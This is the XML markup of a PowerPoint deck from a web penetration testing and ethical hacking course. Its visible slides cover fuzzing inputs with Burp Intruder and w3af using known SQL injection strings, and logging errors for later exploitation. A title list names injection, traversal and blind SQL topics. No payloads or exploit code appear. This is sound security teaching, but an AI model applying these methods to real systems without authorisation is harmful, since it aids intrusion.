                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>SQL injection strings </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>pre-loaded</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lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1371600"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated tests are also useful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> applications will submit data through the various application inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is totally random, but the most effective uses known attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many tools  are able to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Suite's Intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>w3af</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> comes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>fuzzers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1706880"/>
            <a:ext cx="3886200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder is the automated attack tool within the suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We send requests from the other tools to the intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can then choose which attacks we would like to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9469EE7-A04E-4E09-9B68-D677F2F46C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4236720" y="2160254"/>
            <a:ext cx="4592954" cy="25820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8154621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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>After Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="1752600"/>
            <a:ext cx="8107680" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is complete we look for interesting results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Database error messages or HTTP 500 status codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Record them for the next phase, Exploitation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to record:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The parameter that was fuzzed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The input that caused the error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_HE_template">
  <a:themeElements>
    <a:clrScheme name="SANS - Template 2012">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002060"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="002060"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0070C0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B050"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="993300"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF3300"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFC000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="000000"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="000000"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="HE_template">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HE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E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E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E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E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E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E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34144</TotalTime>
  <Words>17443</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1937</Paragraphs>
  <Slides>113</Slides>
  <Notes>113</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113</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="125" baseType="lpstr">
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ ProN W3</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>1_HE_template</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Web Penetration Testing and Ethical Hacking Application Discovery</vt:lpstr>
      <vt:lpstr>Course Outline</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Vulnerability Discovery</vt:lpstr>
      <vt:lpstr>Vuln Discovery Phase Elements and the Organization of PEWAPT101.3 &amp; PEWAPT101.4</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Creating Custom Scripts for Penetration Testing</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Why Python for Web App Pen Testers?</vt:lpstr>
      <vt:lpstr>Python</vt:lpstr>
      <vt:lpstr>Python Variables</vt:lpstr>
      <vt:lpstr>Comments and Code Blocks</vt:lpstr>
      <vt:lpstr>Python If Statement</vt:lpstr>
      <vt:lpstr>Python Looping Structures</vt:lpstr>
      <vt:lpstr>Python Functions</vt:lpstr>
      <vt:lpstr>Python Standard Library</vt:lpstr>
      <vt:lpstr>Making HTTP Requests within Python</vt:lpstr>
      <vt:lpstr>Accessing Files in Python</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Understanding Web App  Vulnerability Types</vt:lpstr>
      <vt:lpstr>Fuzzing</vt:lpstr>
      <vt:lpstr>Examining Results</vt:lpstr>
      <vt:lpstr>FuzzDB</vt:lpstr>
      <vt:lpstr>Context</vt:lpstr>
      <vt:lpstr>Application Context</vt:lpstr>
      <vt:lpstr>Vulnerability Context</vt:lpstr>
      <vt:lpstr>Exploit Context</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Interception Tools</vt:lpstr>
      <vt:lpstr>Setting up Interception Methods</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Fiddler (1)</vt:lpstr>
      <vt:lpstr>Fiddler (2)</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>Using the Interface</vt:lpstr>
      <vt:lpstr>Scanning and Notes</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Burp Suite Components</vt:lpstr>
      <vt:lpstr>Burp Target</vt:lpstr>
      <vt:lpstr>Filtering</vt:lpstr>
      <vt:lpstr>Scope</vt:lpstr>
      <vt:lpstr>Burp Proxy</vt:lpstr>
      <vt:lpstr>Options</vt:lpstr>
      <vt:lpstr>Web Interface</vt:lpstr>
      <vt:lpstr>Burp Spider</vt:lpstr>
      <vt:lpstr>Burp Intruder</vt:lpstr>
      <vt:lpstr>Fuzzing Types</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>Burp Repeater</vt:lpstr>
      <vt:lpstr>Burp Sequencer</vt:lpstr>
      <vt:lpstr>Burp Decoder</vt:lpstr>
      <vt:lpstr>Burp Comparer</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>Types of Information Leakage</vt:lpstr>
      <vt:lpstr>Directory Browsing</vt:lpstr>
      <vt:lpstr>Google Searching  for Directory Browsing</vt:lpstr>
      <vt:lpstr>Manual Discovery  of Directory Browsing</vt:lpstr>
      <vt:lpstr>Automated Discovery of Directory Browsing</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Username Harvesting</vt:lpstr>
      <vt:lpstr>Username Harvesting through Login Error Messages</vt:lpstr>
      <vt:lpstr>Username Harvesting through  URL-based Errors</vt:lpstr>
      <vt:lpstr>Other Issues that Cause  Username Harvesting </vt:lpstr>
      <vt:lpstr>Harvesting Areas</vt:lpstr>
      <vt:lpstr>Testing Methods to Discover Username Harvesting</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Discovering Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection Results</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Directory Traversal  and File Include</vt:lpstr>
      <vt:lpstr>Traditional Example</vt:lpstr>
      <vt:lpstr>Application Example</vt:lpstr>
      <vt:lpstr>Testing for Directory Traversal and File Include Flaws</vt:lpstr>
      <vt:lpstr>Obvious Parameters</vt:lpstr>
      <vt:lpstr>Building Blocks</vt:lpstr>
      <vt:lpstr>Local and Remote File Include</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Causes of SQL Injection</vt:lpstr>
      <vt:lpstr>Discovering SQL Injection</vt:lpstr>
      <vt:lpstr>Fingerprinting the DB</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Important Commands</vt:lpstr>
      <vt:lpstr>Discovering SQL Injection</vt:lpstr>
      <vt:lpstr>Manual Discovery</vt:lpstr>
      <vt:lpstr>TamperData</vt:lpstr>
      <vt:lpstr>Tampering with a Request</vt:lpstr>
      <vt:lpstr>Fuzzing</vt:lpstr>
      <vt:lpstr>Burp Intruder Fuzzing</vt:lpstr>
      <vt:lpstr>After Fuzzing</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Discovering Blind SQL</vt:lpstr>
      <vt:lpstr>20 Questions</vt:lpstr>
      <vt:lpstr>Blind SQL Using Timing</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Absinthe</vt:lpstr>
      <vt:lpstr>Absinthe in Use</vt:lpstr>
      <vt:lpstr>Retrieving DB Schema  and Data</vt:lpstr>
      <vt:lpstr>sqlmap</vt:lpstr>
      <vt:lpstr>sqlmap Features</vt:lpstr>
      <vt:lpstr>Course Roadmap</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Penetration Testing and Ethical Hacking</dc:title>
  <dc:subject>Application Delivery</dc:subject>
  <dc:creator>Kevin Johnson</dc:creator>
  <cp:keywords/>
  <dc:description>processed_12.12.13.rlr
processed_12.21.12.rlr
processed_04.02.12.rlr
processed 061611 rmw
processed 020811 rmw
processed_09.08.10.rlr
processed 05/28/10 rmw
processed 03/10/10 rmw
cooked 070809 rmw - cooked 103009 rmw - 
11/19/09: rev1 is generated by: spacing adjustment to notes on slide 88; grayscale adjustments to slides 16, 17, 18, 19, 20, 22</dc:description>
  <cp:lastModifiedBy>Kevin Johnson</cp:lastModifiedBy>
  <cp:revision>2726</cp:revision>
  <cp:lastPrinted>2013-12-12T19:00:34Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-22T19:59:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-30T13:17:02Z</dcterms:modified>
  <cp:category>Security</cp:category>
</cp:coreProperties>
</file>